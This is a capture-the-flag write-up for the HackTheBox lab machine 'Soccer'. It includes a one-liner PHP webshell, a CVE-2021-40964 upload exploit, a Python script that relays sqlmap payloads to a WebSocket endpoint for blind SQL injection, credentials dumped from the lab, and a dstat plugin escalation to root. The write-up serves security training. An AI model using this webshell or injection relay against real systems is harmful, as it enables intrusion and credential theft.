Soccer [HackTheBox]

Information

This is a retired Linux machine rated as Easy in HackTheBox.

Although the machine is tagged as Easy, the privilege escalation vectors found in the machine is a great way to be exposed to common and application-specific vulnerabilities and exploitation.

Reconaissance

We are given a web application located in soccer.htb.

By using gobuster, we can find /tiny as a valid URL path

1

gobuster dir -u soccer.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -o medium.gobuster

Navigating through /tiny, we can find that the running application in the endpoint is Tiny File Manager with version 2.4.3

Searching in Google tells us that default credentials for Tiny File Manager is admin/admin@123.

This could be of use in the future.

Since we have the version number of our running application (2.4.3), we can search for common exploits in ExploitDB using the command

1

searchsploit

When we do so, we can find an exploit for version 2.4.6.

Checking the .sh file we see that the CVE is CVE-2021-40964, and on NVD - CVE-2021-40964 (nist.gov), we see that the exploit in question involves versions under 2.4.6 as well. This means that 2.4.3 potentially vulnerable to this exploit as well:

Fixing the exploit

When running the script, an error occurs with a function name on Line 46.

Renaming “log-in” to “login” in the file fixes it.

Authenticated Exploitation

When attempting to upload a webshell using the exploit, an error occurs indicating that we are unable to upload it to /var/www/html.

As a result, we can attempt to upload it to /tiny/uploads. This will provide us with a command shell using a one-liner PHP shell (code below).

1

<?php system($_GET['cmd']); ?>

I created a meterpreter_ _shell for persistence and better session handling. With the meterpreter shell, I uploaded it to /var/tmp (a directory which commonly has read and write permissions for all users) and ran it using the webshell and we get a local shell.

Checking /etc/passwd, we find that there are users in the machine named player and laurel.

Local User

While using LinPEAS to search for privilege escalation vectors, we find a vulnerability that affects the Polkit authentication service.

The vulnerability is identified as CVE-2021-3560 and it is known to allow attackers to gain elevated privileges on a Linux system.

However, since this is a Buffer Under-read Vulnerability, there is a high chance that it may lead to a system crash or similar issues. As such, it may be best to hold this path as a last resort.

While checking the output of our LinPEAS scan, we find another potential web application hosted on the machine called soc-player.soccer.htb:

After adding the domain to our /etc/hosts file, we can visit the site using a web browser.

The site looks similar to soccer.htb albeit with new features as shown in the Dashboard below:

Doing some random input validation checks in form fields, SQL Injection works for the /check endpoint:

As shown below, the webpage is delayed by 3 seconds as dictated by the sleep command in SQL:

Using Burp Suite, we find that these forms use WebSockets instead of a usual POST request to transmit data from our machine to the server (i.e., the target machine).

Using information from this article from rayhan0x01, we can use this modified exploit to exploit the websockets in /check:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091"

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line	
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
	
	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"id":"%s"}' % message

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
				
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass

Exploitation

Start by running the middleware server, and afterwards SQLMap:

1

sqlmap -u http://localhost:8081/?id=1 -p "id" --proxy=http://127.0.0.1:8080

After a while we find that it is injectable as time-based Blind (as per our testing earlier)

Let’s try dumping the database:

While waiting for the grueling time-based blind exploitation, SQLMap reached the accounts table:

We find potential credentials that we can use from our SQL Injection

1
2

user: player
pass: PlayerOftheMatch2022

Tried logging into the found credentials (player:PlayerOftheMatch2022) in SSH and it works:

We got local flag!

Privilege Escalation

LinPEAS

As mentioned previously, one possible method for privilege escalation is to exploit the Polkit vulnerability. However, another option has been found in LinPEAS:

It seems that doas is installed. For reference, _doas _was made as an alternative to sudo to resolve complexity in its syntax. Further information can be found in this article. Let’s try using both methods for this machine!

Firstly, the PolKit Exploit method

Using various scripts in GitHub, I was not able to exploit CVE-2021-3560 due to gnome-control-center not being installed in the target machine:

Sadly, this method doesn’t seem to be the way to root.

Finally, doas method

Since player can run dstat as root (as shown below), let’s see if we can find a way to exploit this functionality.

dstat seems to be a Python script, which is easy root if we could edit it but unfortunately, we do not have write permissions on dstat:

Given these, we could try to find a separate way to exploit our permissions to dstat.

From this article, it seems we can create a custom plugin which dstat can then execute.

With this knowledge, we can create a malicious Python script as our plugin, which will then run as root.

Following the steps in the article, let’s first find the dstat directory which stores the plugins:

1

find / -type d -name dstat 2>/dev/null

Fortunately, the location is the same as in the article, which is in /usr/local/share/dstat

where we also have write permissions and the group is set to us, player

Afterwards, create a plugin file with template name <dstat_xxx>, for my purposes I used _dstat_exploit.py. _Then afterwards, ran the plugin using —exploit:

And we got root!

Transferred my public key then so that I could SSH, and we got the root flag: